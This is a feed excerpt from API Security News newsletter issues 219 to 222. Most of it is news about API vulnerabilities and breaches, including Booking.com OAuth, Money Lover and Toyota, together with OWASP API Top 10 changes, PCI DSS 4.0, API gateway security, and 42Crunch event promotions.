<li>InQL, which is a set of Burp extensions for GraphQL</li>
<li>Sqlmap, which is the ubiquitous SQL injection tool</li>
</ul>
<p>The guide covers the following topics: fingerprinting the server, denial-of-service attacks (including batch query attacks, deep recursion query attacks, resource-intensive query attacks, field duplication attacks, alias-based attacks, and circular fragment attacks), information disclosure (GraphQL introspection, GraphQL interface, GraphQL field suggestions and Server side request forgery (SSRF)), injection (SQL, OS command, stored XSS, logging and HTML), authorization bypass (GraphQL interface protection bypass, GraphQL query deny list bypass and GraphQL JWT token forge),  and several other miscellaneous topics.</p>
<p>In conclusion, Edward recommends the “Black Hat GraphQL” book from Nick Aleks (<a href="https://twitter.com/Nick_Aleks" target="_blank" rel="noopener">@Nick_Aleks</a>) and Dolev Farhi (<a href="https://twitter.com/dolevfarhi" target="_blank" rel="noopener">@dolevfarhi</a>), featured <a href="https://apisecurity.io/issue-221-credential-leakage-fueling-api-breaches-api-gateway-security-pci-dss-4-impact-on-api-security/" target="_blank" rel="noopener">here last week</a>. This is a comprehensive guide, and I thank Edward for contributing to the community. Keep your eyes open for more guides from Edward in the near future.</p>
<h2>Article: Twitter API outage blocks access</h2>
<p>It feels like we cover Twitter and its API travails every other issue (<a href="https://apisecurity.io/issue-211-sqli-vulnerability-zendesk-explore-twitter-api-vulnerability-api-threats-data-driven-enterprises/" target="_blank" rel="noopener">here</a> and <a href="https://apisecurity.io/issue-217-wordle-api-exposes-answers-twitter-api-breach-updates-aws-exposed-dangerous-api/" target="_blank" rel="noopener">here</a>), and today <a href="https://www.bleepingcomputer.com/news/technology/twitter-api-outage-blocks-sign-ins-breaks-most-platform-features/" target="_blank" rel="noopener">we have another story</a> making the news — this time, an API outage blocking access to users. In this case, it appears that a relatively minor change to an API backend caused a major outage, affecting their APIs and mobile and web applications. The outage was reported globally, with users encountering various error messages relating to API access. Twitter support acknowledged the outage on their Twitter feed, and Elon Musk later admitted that a <cite>&#8220;small API change had massive ramifications&#8221;</cite> and would <cite>&#8220;ultimately need a complete rewrite.&#8221;</cite></p>
<p>This outage comes shortly after Twitter announced plans to shut down its free access tier. Needless to say, re-engineering an API at the scale of Twitter&#8217;s will incur some measure of instability; it would be no surprise if this were to re-occur.</p>
<h2>Article: Upcoming changes to OWASP API Security Top 10</h2>
<p>Finally, in this week&#8217;s news is <a href="https://danaepp.com/owasp-api-security-top-10-upcoming-changes-you-need-to-know-about" target="_blank" rel="noopener">coverage from Dana Epp</a> on the <del>upcoming</del> recently announced changes to the OWASP API Security Top 10. To quote Dana — <cite>&#8220;while a lot has stayed the same, a lot has changed.&#8221;  </cite>This topic will be covered in a lot more detail in upcoming weeks (and months !) so I will summarise briefly only.</p>
<p>Two flaw categories drop off the Top 10 list, namely API8:2019 &#8211; Injection and API10:2019 &#8211; Insufficient Logging &amp; Monitoring. In the case of injection flaws, this does not indicate any reduction in this attack vector but indicates that API-specific attacks have risen to prominence. In fact, as recently as issue 200, <a href="https://apisecurity.io/issue-200-injection-vulnerability-in-bitbucket-oauth2-exploitation-and-200th-issue-prize-giveaways/" target="_blank" rel="noopener">we have reported</a> on a command injection vulnerability. Insufficient Logging and Monitoring is an evergreen topic for software security and best practice guidance should be employed for API development.</p>
<p>There are three new additions to the Top 10: firstly, API7:2023 &#8211; Server Side Request Forgery reflects the rise in attacks leveraged against APIs forcing them to redirect to URLs outside of the APIs control. Secondly, API08: Lack of Protection from Automated Threats reflects the rise in prominence of bot or automated attacks against APIs. Finally, API10: Unsafe Consumption of APIs addresses the dangers of placing implicit trust in 3rd party APIs.</p>
<p>Keep reading to get up to date with our detailed coverage (see the next article !) of the new Top 10 and, most importantly, how you can defend yourself against these new vectors. Thanks as ever for the article Dana.</p>
<h2>Event: apidays Interface 2023</h2>
<p>I will be speaking at the upcoming <a href="https://www.apidays.global/interface/" target="_blank" rel="noopener">apidays Interface 2023</a> online event on the topic of &#8211; you guessed it &#8211; the recent changes to the OWASP API Security Top 10 recently announced. I&#8217;ll focus on the new flaw categories introduced, particularly looking at real-world examples of these flaws resulting in vulnerabilities.</p>
<p>Join me (and several of our other frequent contributors to the newsletter) on the 28th and 29th June 2023, as we cover everything relating to APIs, including security.</p>
<h2>Event: 42Crunch at Infosecurity 2023</h2>
<p>Infosecurity 2023 takes place from the 20th to the 22nd of June 2023 at the ExCel center in London, and 42Crunch will be in attendance at booth #M85. Join me and my colleagues during the week for a coffee and chat, or attend one of our events, namely:</p>
<ul>
<li>10-minute lightning talks on the hour at the booth on topics pertaining to API security.</li>
<li>my 90-minute deep-dive workshop on <a href="https://www.infosecurityeurope.com/en-gb/conference-programme/session-details.3162.189030.api-security-done-right-_-best-practices-for-secure-api-development.html" target="_blank" rel="noopener">API Security Done Right &#8211; Best Practices for Secure API Developmen</a>t at 10 am on 21st June.</li>
</ul>
<p><a href="https://42crunch.com/book-a-meeting-api-security-expert/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-10683" src="https://apisecurity.io/wp-content/uploads/2023/06/Article6.jpg" alt="" width="604" height="343" srcset="https://apisecurity.io/wp-content/uploads/2023/06/Article6.jpg 695w, https://apisecurity.io/wp-content/uploads/2023/06/Article6-300x171.jpg 300w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-222-attackers-exploiting-apis-faster-than-ever-dvga-walkthrough-twitter-outage/">Issue 222: Attackers exploiting APIs faster than ever, DVGA walkthrough, Twitter outage</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 221: Credential leakage fueling API breaches, API gateway security, PCI DSS 4 impact on API security</title>
		<link>https://apisecurity.io/issue-221-credential-leakage-fueling-api-breaches-api-gateway-security-pci-dss-4-impact-on-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Sat, 03 Jun 2023 12:41:15 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10479</guid>

					<description><![CDATA[<p>This week, we have an article on the rise in API breaches as a result of credential leakage and how this can be addressed by using &#8220;MFA for APIs&#8221;. We also have a thought-provoking read on how to select an API gateway based on its security characteristics and a brief review of PCI DSS 4.0&#8217;s [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-221-credential-leakage-fueling-api-breaches-api-gateway-security-pci-dss-4-impact-on-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-221-credential-leakage-fueling-api-breaches-api-gateway-security-pci-dss-4-impact-on-api-security/">Issue 221: Credential leakage fueling API breaches, API gateway security, PCI DSS 4 impact on API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have an article on the rise in API breaches as a result of credential leakage and how this can be addressed by using &#8220;MFA for APIs&#8221;. We also have a thought-provoking read on how to select an API gateway based on its security characteristics and a brief review of PCI DSS 4.0&#8217;s impact on secure API development methodology. Finally, we have news of the recently released &#8220;Black Hat GraphQL: Attacking Next Generation APIs&#8221; book.</p>
<h2>Article: Credential leakage fueling the rise in API breaches</h2>
<p>First up this week, we have a <a href="https://www.securityweek.com/credential-leakage-fueling-rise-api-breaches/" target="_blank" rel="noopener">timely article from Security Week</a> on the rise of API breaches arising as a result of credential leakage. The article is based on recent research by Corsha (an IDAM provider focusing on APIs) who surveyed over 400 US-based professionals on their API security posture. Of these, 53% had suffered an API breach, while 77% felt that their organization effectively managed their API tokens. This leads to a somewhat paradoxical conclusion that whilst many professionals are confident in their credential management, they suffer credential-related breaches regardless.</p>
<p>The report concludes that there are three fundamental causes behind this apparent contradiction, namely:</p>
<ul>
<li>A lack of visibility into their portfolio of existing APIs.</li>
<li>The sheer volume of APIs that are in use makes them hard to track.</li>
<li>Underestimating the time and effort invested in managing those API credentials.</li>
</ul>
<p>The survey measures the effort (and hence cost) associated with credential management and claims that most respondents spend more than 15 hours per week managing credentials. Although this is probably a very rough estimate, it indicates how costly credential management is becoming. As they note, this problem will only worsen as API sprawl continues unabated and build environments become more distributed, requiring more credential distribution and management. As the scale of the challenge grows, organizations will be left with a Hobson&#8217;s choice of either ignoring the problem or spending more money on an activity that is not revenue-generating.</p>
<p>Corsha&#8217;s solution to the problem is interesting and can be loosely described as &#8220;MFA for APIs.&#8221; The solution offers three advantages:</p>
<ul>
<li>MFA from machine to machine allows micro-segmentation, which prevents lateral movement in networks.</li>
<li>One-time MFA between machines reduces the risk of &#8220;MFA fatigue, &#8221; a common attack vector used against humans.</li>
<li>The problem of credential rotation is largely removed since stolen or leaked credentials cannot be used without satisfying the MFA requirements.</li>
</ul>
<p>It will be interesting to see how Corsha progresses with its product — certainly, credential leakage is a very real problem for APIs.</p>
<h2>Article: How secure is your API gateway?</h2>
<p>The next article is <a href="https://thenewstack.io/how-secure-is-your-api-gateway/" target="_blank" rel="noopener">a really interesting read from The New Stack</a> on the importance of the security of your API gateway. The author believes that because the API gateway is such a critical piece of infrastructure, it is important that those responsible for deploying gateways fully consider the security of the gateway itself. Due to their tight coupling into an organization&#8217;s infrastructure, API gateways are infrequently changed, making it much more important that security is a top consideration when choosing the gateway. The author considers four factors contributing to an API gateway&#8217;s overall security posture; let us look at each of the four in turn.</p>
<p>Firstly, API gateways are often built on top of an open-source implementation with a bespoke closed-source layer. This makes it important that vulnerabilities within the entire software stack are tracked and managed using modern Software Bill of Materials (SBOM) techniques. This gives the buyer an informed view of the risk inherent in the gateway implementation. Similarly, the buyer should consider other factors, such as the SLA for remediating zero days vulnerabilities.</p>
<p>Secondly, the buyer should consider how well the gateway integrates with other security elements such as web application firewalls (WAFs), global firewalls and load balancers, and monitoring platforms (SIEMs/SOCs). Tight integration is important to ensure adequate application performance and also, importantly, to minimize the impact on operational teams when deploying new versions in complex hybrid multi-cloud environments.</p>
<p>Thirdly, a buyer in a large organization should consider how well the same policy can be enforced across the entire organization, which may be built on top of a very heterogeneous technology stack. The author cites the example of different underlying reverse proxies, which may implement the same policy in a different manner. These subtle differences may only become apparent with very fine-grained policies, which may often result in a compromise where the operators are forced to fall back to more basic policies leaving gaps in protection. The only way around this is to ensure that the buying organization conducts a thorough proof-of-concept (PoC) before purchasing.</p>
<p>Finally, the speed (latency) of the gateway is critical for its adoption and long-term success. If a chosen gateway is shown to be poorly performant, then unfortunately, API teams will seek to detune policies or, in the extreme, to bypass the gateway entirely. The performance of an API is often a critical factor in its success, and if a gateway impacts the performance, teams may resort to shadow IT practices to deploy their APIs.</p>
<p>This is a really interesting take on a well-trodden topic and worth considering if you are evaluating API gateways.</p>
<h2>Article: The impact of PCI DSS 4.0 on API security</h2>
<p>The PCI DSS standard is among the most widely applicable standards for software providers affecting anyone who processes payments by card. The most recent version 4.0 makes specific provisions for the secure development and deployment of software; <a href="https://professionalsecurity.co.uk/news/interviews/176766-2/" target="_blank" rel="noopener">our next article looks at how</a> the standard&#8217;s provisions will likely impact API developers.</p>
<p>There are several key clauses specific to the development and deployment of software; for each of these, the author reviews best practices for API development to ensure adherence to the standard.</p>
<p><code>6.2 – Bespoke and custom software are developed securely.</code></p>
<p>This is guidance to adopt a secure SDLC or to embrace &#8220;shift-left&#8221; development. For API development, developers must be aware of security requirements as early as possible and utilize secure development methodologies throughout the lifecycle.</p>
<p><code>6.2.3 – Bespoke and custom software is reviewed prior to being released into production or to customers, to identify and correct potential coding vulnerabilities.</code></p>
<p>This clause guides developers to use code reviews &#8211; of both OAS definitions and API code &#8211; to ensure that the implementation is free from coding vulnerabilities as far as possible. These reviews can also be automated at various stages through the development lifecycle to ensure vulnerabilities are removed at every opportunity.</p>
<p><code>6.2.4 – Software engineering techniques or other methods are defined and in use by software development personnel to prevent or mitigate common software attacks and related vulnerabilities in bespoke and custom software.</code></p>
<p>In an API context, this control dictates the use of advanced testing methods to identify various software attacks on APIs. The recommended best practice is to use specific API testing to detect well-known vulnerability types (such as broken object-level authorization and broken authentication) using automated testing (dedicated API security scanning tools) or via bespoke penetration tests.</p>
<p><code>6.4 Public-facing web applications are protected against attacks.</code></p>
<p>Finally, the standard specifies that public-facing APIs should be protected against attacks, typically via API gateways or dedicated API firewalls.</p>
<p>There are probably no great surprises here for our readers, but it is a timely reminder that these controls are actually mandated by PCI DSS 4.0.</p>
<h2>Book: &#8220;Black Hat GraphQL&#8221;</h2>
<p>We seldom feature book reviews in this newsletter, and I was reminded of a <a href="https://twitter.com/hAPI_hacker/status/1631784779082526720" target="_blank" rel="noopener">top book recommendation seeing a Tweet</a> from <a href="https://twitter.com/hAPI_hacker" target="_blank" rel="noopener">@hAPI_hacker</a> recently. Recently Nick Aleks (<a href="https://twitter.com/Nick_Aleks" target="_blank" rel="noopener">@Nick_Aleks</a>) and Dolev Farhi (<a href="https://twitter.com/dolevfarhi" target="_blank" rel="noopener">@dolevfarhi</a>) released their joint collaboration &#8220;Black Hat GraphQL: Attacking Next Generation APIs&#8221; on <a href="https://nostarch.com/black-hat-graphql" target="_blank" rel="noopener">No Starch Press</a>, and it is receiving favorable reviews from many quarters. There really is a scarcity of top-notch security resources on GraphQL, and this book is a must for both attackers and defenders alike.</p>
<p>Thanks for the contribution to the community, Nick And Dolev!</p>
<p><a href="https://nostarch.com/black-hat-graphql" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-10666" src="https://apisecurity.io/wp-content/uploads/2023/06/Article4.jpg" alt="" width="524" height="694" srcset="https://apisecurity.io/wp-content/uploads/2023/06/Article4.jpg 476w, https://apisecurity.io/wp-content/uploads/2023/06/Article4-227x300.jpg 227w" sizes="auto, (max-width: 524px) 100vw, 524px" /></a></p>
<h2>Event: Gartner Security &amp; Risk Management Summit</h2>
<p>The annual Gartner Security &amp; Risk Management Summit takes place next week in National Harbor, Maryland.<br />
If you&#8217;re attending, be sure to visit the 42Crunch Booth #254 to learn all about our<br />
latest features and innovations to help improve your API Security Testing and API Threat Protection.</p>
<p>You can also <a href="https://info.42crunch.com/e3t/Ctc/RG+113/cz53804/VVC09r4kSb2RW3Yc2-z4JPTX4W78L4Hk4_g1CjM_h9pG3q3nJV1-WJV7CgCBmW5XZylc4mW84jN35wjrvlW3BzVtKyns6lLKhvVGwcDF1rrhBzN30Wx2BmjtR6W3ZQFV-25L6_WW6Fjp9h5sHpSBW6wZwCc5zgT6MW7-frqZ6TB-x_W2_TBVh2lsjY0W3dg4hL92BhJ2W5QnTLy89BMK3W5-P3BZ83q3MzW7dpdKh48rM7mVNvdC53d2m39N3_BQm-bNcKVW5c9pgQ84tQ4xVslY275PjFFlN69Gw_N-zmtRW7j5Fdr1PLT-CW8ffrKV8VkPCbW22h2pX8tF0WSW8vBGLB17zg8XN3_vD_bYY0fq3dNy1" target="_blank" rel="noopener">book a meeting</a> with any of the 42Crunch onsite experts to discuss your API security challenges and strategy.</p>
<p><a href="https://info.42crunch.com/e3t/Ctc/RG+113/cz53804/VVC09r4kSb2RW3Yc2-z4JPTX4W78L4Hk4_g1CjM_h9pG3q3nJV1-WJV7CgCBmW5XZylc4mW84jN35wjrvlW3BzVtKyns6lLKhvVGwcDF1rrhBzN30Wx2BmjtR6W3ZQFV-25L6_WW6Fjp9h5sHpSBW6wZwCc5zgT6MW7-frqZ6TB-x_W2_TBVh2lsjY0W3dg4hL92BhJ2W5QnTLy89BMK3W5-P3BZ83q3MzW7dpdKh48rM7mVNvdC53d2m39N3_BQm-bNcKVW5c9pgQ84tQ4xVslY275PjFFlN69Gw_N-zmtRW7j5Fdr1PLT-CW8ffrKV8VkPCbW22h2pX8tF0WSW8vBGLB17zg8XN3_vD_bYY0fq3dNy1" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-10642" src="https://apisecurity.io/wp-content/uploads/2023/06/Article5.jpg" alt="" width="605" height="345" srcset="https://apisecurity.io/wp-content/uploads/2023/06/Article5.jpg 915w, https://apisecurity.io/wp-content/uploads/2023/06/Article5-300x171.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/06/Article5-768x438.jpg 768w" sizes="auto, (max-width: 605px) 100vw, 605px" /></a></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-221-credential-leakage-fueling-api-breaches-api-gateway-security-pci-dss-4-impact-on-api-security/">Issue 221: Credential leakage fueling API breaches, API gateway security, PCI DSS 4 impact on API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 220: API flaw in Booking.com, apps leaking sensitive API data, API security testing checklist</title>
		<link>https://apisecurity.io/issue-220-api-flaw-in-booking-com-apps-leaking-sensitive-api-data-api-security-testing-checklist/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 25 May 2023 16:10:25 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10553</guid>

					<description><![CDATA[<p>This week, we have news of a vulnerability affecting the OAuth2 implementation on the Booking.com website. We have a report from Approov on their research into financial apps in the Google Play store and another great article from Dana Epp on API security checklists. Finally, we cover an interview with Matias Madou on the need [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-220-api-flaw-in-booking-com-apps-leaking-sensitive-api-data-api-security-testing-checklist/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-220-api-flaw-in-booking-com-apps-leaking-sensitive-api-data-api-security-testing-checklist/">Issue 220: API flaw in Booking.com, apps leaking sensitive API data, API security testing checklist</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of a vulnerability affecting the OAuth2 implementation on the Booking.com website. We have a report from Approov on their research into financial apps in the Google Play store and another great article from Dana Epp on API security checklists. Finally, we cover an interview with Matias Madou on the need for people-driven security.</p>
<h2>Vulnerability: API flaw in Booking.com could affect other sites</h2>
<p>Recent research <a href="https://www.itsecurityguru.org/2023/03/02/serious-api-security-flaws-now-fixed-in-booking-com-could-affect-many-more-websites/" target="_blank" rel="noopener">featured in IT Security Guru</a> revealed an API flaw in the Booking.com platform relating to implementing the Open Authorization (OAuth) social-login functionality. Booking.com&#8217;s teams immediately investigated the findings, resolved the vulnerability, and thanked the researchers, encouraging others in the global security community to participate in their bug bounty program.</p>
<p>The technical details of the vulnerability are somewhat limited, with the report indicating that a vulnerability existed in the Facebook social login using OAuth2. Commonly web developers use social logins as an expediency to prevent users from having to create a bespoke username and password credential pair. Whilst convenient from an end-user point of view, a poorly implemented OAuth2 implementation can significantly impact users. As the report suggests, it was possible that this misconfiguration could have allowed for large-scale account takeover (ATO) on customers&#8217; accounts and server compromise, allowing bad actors to manipulate platform users to gain complete control over their accounts. In addition, it would have been possible to steal Personal Identifiable Information (PII) and other sensitive user data stored internally by the sites; or perform any action on behalf of the user.</p>
<p>This a timely reminder to API developers that whilst OAuth2 (or other standard mechanisms) should be used as far as possible, their complexity can result in insecure implementations with significant consequences.</p>
<h2>Report: Financial apps in Google Play store leaking sensitive API data</h2>
<p>Next, <a href="https://www.scmagazine.com/news/application-security/financial-apps-google-play-leaked-data" target="_blank" rel="noopener">we have an eye-opening report</a> from newsletter regular Approov on their research into financial apps on the Google Play store. The key takeaway was that ninety-two percent of financial apps hosted on the Google Play App Store contain extractable data such as API keys. Of those leaky apps, nearly a quarter spilled &#8220;extremely sensitive&#8221; data, such as authentication keys used for payments and monetary account transfers. The research is based on the &#8220;top 200&#8221; financial services apps from the Google Play App Store in the United States, United Kingdom, France, and Germany.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10558" src="https://apisecurity.io/wp-content/uploads/2023/05/Article2.jpg" alt="" width="500" height="663" srcset="https://apisecurity.io/wp-content/uploads/2023/05/Article2.jpg 495w, https://apisecurity.io/wp-content/uploads/2023/05/Article2-226x300.jpg 226w" sizes="auto, (max-width: 500px) 100vw, 500px" /></p>
<p>Approov uses a five-point framework to identify mobile application attack surfaces leading to secret leakage. These are:</p>
<ol>
<li>User credentials</li>
<li>Application integrity</li>
<li>Device integrity</li>
<li>API channel integrity</li>
<li>Service vulnerabilities</li>
</ol>
<p>According to Approov, most apps surveyed had very poor defenses against attacks targeting the device environment, and even fewer were well protected against machine-in-the-middle (MitM) attacks. Such attacks allow adversaries to insert themselves in the communication channel between the device and API service and effectively subvert otherwise secure communication channels.</p>
<p>In conclusion, Approov makes the following three top recommendations for improving secret and API key security, namely:</p>
<ul>
<li><strong>Protect secrets:</strong> never embed secrets in code, as they can almost always be reverse-engineered.</li>
<li><strong>Use runtime protection:</strong> using a runtime protection environment can prevent tampering with the device of the communications channel.</li>
<li><strong>Manage secrets using a secure cloud service:</strong> Use a cloud service to deliver secrets to the device on an on-demand basis only if the device is deemed secure.</li>
</ul>
<p>Some very useful advice for mobile app developers; thanks to the team at Approov for their contribution.</p>
<h2>Article: API security testing checklist</h2>
<p>By now, most readers will be familiar with the fine work Dana Epp is doing in the community with his thought-provoking articles, and this week is no different. This time <a href="https://danaepp.com/an-api-security-testing-checklist-with-a-twist" target="_blank" rel="noopener">it&#8217;s an API security checklist</a> (based on the fine <a href="https://github.com/shieldfy/API-Security-Checklist" target="_blank" rel="noopener">Shieldify list</a>) but with a mapping to the MITRE Common Attack Pattern Enumeration and Classification (CAPEC). By creating this mapping, it allows teams to understand how to assess findings based on the attack type, how the exploits work, how they can be detected, and the skill levels needed to conduct the attack.</p>
<p>I won&#8217;t reproduce the full list here, but I recommend security practitioners take a good list through Dana&#8217;s list and the original list.</p>
<p><a href="https://danaepp.com/an-api-security-testing-checklist-with-a-twist" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-10573" src="https://apisecurity.io/wp-content/uploads/2023/05/Article3.jpg" alt="" width="511" height="359" srcset="https://apisecurity.io/wp-content/uploads/2023/05/Article3.jpg 511w, https://apisecurity.io/wp-content/uploads/2023/05/Article3-300x211.jpg 300w" sizes="auto, (max-width: 511px) 100vw, 511px" /></a></p>
<p>My favorite tip from this article was the pointer to the <a href="https://capec.mitre.org/data/definitions/3000.html" target="_blank" rel="noopener"><em>Domains of Attack</em> viewer</a> from MITRE — this allows visualization of the top-level domains, then the meta domains, then the standard attack patterns, and finally, the detailed attack patterns. The viewer also has an excellent filter capability to filter on likelihood, scope, severity, and technical impact.</p>
<h2>Article: People-driven remediation is key to strong API security</h2>
<p>Finally, this week, <a href="https://www.helpnetsecurity.com/2023/02/20/people-driven-remediation-strong-api-security-video/" target="_blank" rel="noopener">we feature an interview</a> with Matias Madou, Secure Code Warrior CTO, on why people-driven remediation is the key to strong API security.</p>
<p>Madou warns against pursuing every latest and greatest security tool since this can distract development teams whose time would be better spent understanding the basics of secure API development.</p>
<h2>Webinar: Mastering Secure API Development with GitHub and 42Crunch</h2>
<p>With over 100 million users and 330 million repositories, GitHub has become the de facto home of software development. GitHub has become so much more than purely a Git repository hosting platform. With features such as repository forking, pull requests, and, most notably, GitHub Actions is now a one-stop development platform. 42Crunch is the developer-first API security platform with plugins for VS Code and GitHub to automate the process of building secure APIs right in the developer&#8217;s natural environment.</p>
<p>Join Colin Domoney (​​Chief Technology Evangelist at 42Crunch) and Isabelle Mauny (Field CTO at 42Crunch) on June 13, 2023 at 9am PDT / 5pm BST, as <a href="https://42crunch.com/mastering-secure-api-development-with-github-and-42crunch/" target="_blank" rel="noopener">they take a deep dive with live demos</a> into how 42Crunch combines with GitHub to facilitate secure API development:</p>
<p>This practical demo will showcase the following:</p>
<ul>
<li>Discover OpenAPI definitions automatically within repositories.</li>
<li>Audit OpenAPI definitions in GitHub Actions and view results alongside other code scanning tools all in a single view.</li>
<li>Scan your API for security vulnerabilities directly within GitHub Actions.</li>
<li>Deploy the 42Crunch API firewall within GitHub Actions.</li>
<li>Protect your main branch by performing automated testing of APIs directly within the pull request process, allowing informed risk-based decisions for reviewers.</li>
<li>Using the 42Crunch GitHub application to enrich the pull request annotations further, allowing better decision-making for the reviewer.</li>
<li>Drive the entire process without ever leaving VS Code!</li>
</ul>
<p><a href="https://42crunch.com/mastering-secure-api-development-with-github-and-42crunch/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-10540" src="https://apisecurity.io/wp-content/uploads/2023/05/Article5.jpg" alt="" width="610" height="141" srcset="https://apisecurity.io/wp-content/uploads/2023/05/Article5.jpg 861w, https://apisecurity.io/wp-content/uploads/2023/05/Article5-300x69.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/05/Article5-768x178.jpg 768w" sizes="auto, (max-width: 610px) 100vw, 610px" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-220-api-flaw-in-booking-com-apps-leaking-sensitive-api-data-api-security-testing-checklist/">Issue 220: API flaw in Booking.com, apps leaking sensitive API data, API security testing checklist</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 219: Money Lover app exposes user data, most web API flaws missed by standard testing</title>
		<link>https://apisecurity.io/issue-219-money-lover-app-exposes-user-data-most-web-api-flaws-missed-by-standard-testing/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Fri, 12 May 2023 15:30:37 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10427</guid>

					<description><![CDATA[<p>This week, we have news of a recent vulnerability in the Money Lover finance app, and a report into a recent vulnerability in Toyota vehicles, which, according to Toyota, did not result in malicious access. We have an article featuring the views of popular contributor Corey Ball on missing API flaws by using conventional testing [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-219-money-lover-app-exposes-user-data-most-web-api-flaws-missed-by-standard-testing/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-219-money-lover-app-exposes-user-data-most-web-api-flaws-missed-by-standard-testing/">Issue 219: Money Lover app exposes user data, most web API flaws missed by standard testing</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of a recent vulnerability in the Money Lover finance app, and a report into a recent vulnerability in Toyota vehicles, which, according to Toyota, did not result in malicious access. We have an article featuring the views of popular contributor Corey Ball on missing API flaws by using conventional testing and, finally, an update on Twitter&#8217;s ongoing efforts to thwart the rise of bots on their platform.</p>
<h2>Vulnerability: Money Lover app exposes user data</h2>
<p>First up this week is <a href="https://www.darkreading.com/application-security/-money-lover-finance-app-exposes-user-data" target="_blank" rel="noopener">coverage from Dark Reading on a potential vulnerability</a> in the &#8220;Money Lover&#8221; app developed by Vietnam-based Finsify. The app is a tool for managing personal finances and has a 4.6-star rating from over 1,000 reviewers. According to researchers at Trustwave, the app leaked no actual bank account or credit card details but warned that the financial institution could suffer a reputation hit.</p>
<p>The problem was identified by Trustwave researcher Troy Driver who discovered a problem with Money Lover&#8217;s security when routing its traffic through a proxy server. Email addresses, wallet names, and live transaction data for each shared wallet were visible to him. The researcher does not reveal the precise details of the vulnerability discovered. However, this has all the hallmarks of broken access control, either <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener">broken object-level authorization</a> or <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener">broken user authentication</a>. The fact that user information is divulged also indicates the presence of an <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener">excessive data exposure</a> flaw.</p>
<p>Readers of this newsletter know only too well both the prevalence and impact of these API vulnerabilities. In this example, the vulnerability was trivially found using a reverse proxy. Although no significant account data was divulged in this example, such vulnerabilities can give an attacker a real foothold into an app for further more targeted or sophisticated attacks. Even in this example, email information was leaked which can form the basis of a targeted phishing campaign targeting users of the app.</p>
<p>Users are advised to update their Money Lover app to the latest version, where the vulnerability has been fixed as of January 27th, 2023.</p>
<h2>Vulnerability: No evidence of malicious access, says Toyota</h2>
<p><a href="https://therecord.media/toyota-says-no-evidence-malicious-access-eaton-zveare" target="_blank" rel="noopener">According to a recent report</a>, Toyota said a security flaw that allowed employees extensive access to a platform they used to manage operations had been fixed. This comes on the back of a publication from security researcher Eaton Zveare who said he was able to take advantage of a poorly secured application programming interface (API) to break into the Toyota GSPIMS system and had full access to internal Toyota projects, documents, and user accounts, including user accounts of Toyota&#8217;s external partners/suppliers.</p>
<p>Zveare said he had access to more than 14,000 users, confidential documents, projects, supplier rankings/comments, and more and that he reported the issue to Toyota in November. A Toyota spokesperson confirmed that Zveare contacted the company about the issue. An attacker would have been able to add their account without ever being discovered and remain in perpetual access to Toyota&#8217;s data without ever being discovered, disrupting Toyota&#8217;s operations worldwide.</p>
<p>Toyota remediated the vulnerability in less than three weeks and was lauded for having the &#8220;fastest and most effective&#8221; response to security issues. They reminded researchers who wish to collaborate with Toyota to participate in its coordinated disclosure program.</p>
<h2>Article: Corey Ball on API flaws missed by standard testing</h2>
<p>The team at The Daily Swig <a href="https://portswigger.net/daily-swig/most-web-api-flaws-are-missed-by-standard-security-tests-corey-j-ball-on-securing-a-neglected-attack-vector" target="_blank" rel="noopener">recently interviewed Corey Ball</a> on his thoughts on API security in 2023. The key takeaway for me from this fascinating discussion was the fact that Ball feels that a different approach is needed for API security from that used in more classic web application security. While web application security tools are still valuable and have their uses in securing APIs from classic flaws (such as SQL Injection), they do lack the full context of an API implementation to be able to detect certain classes of API vulnerability.</p>
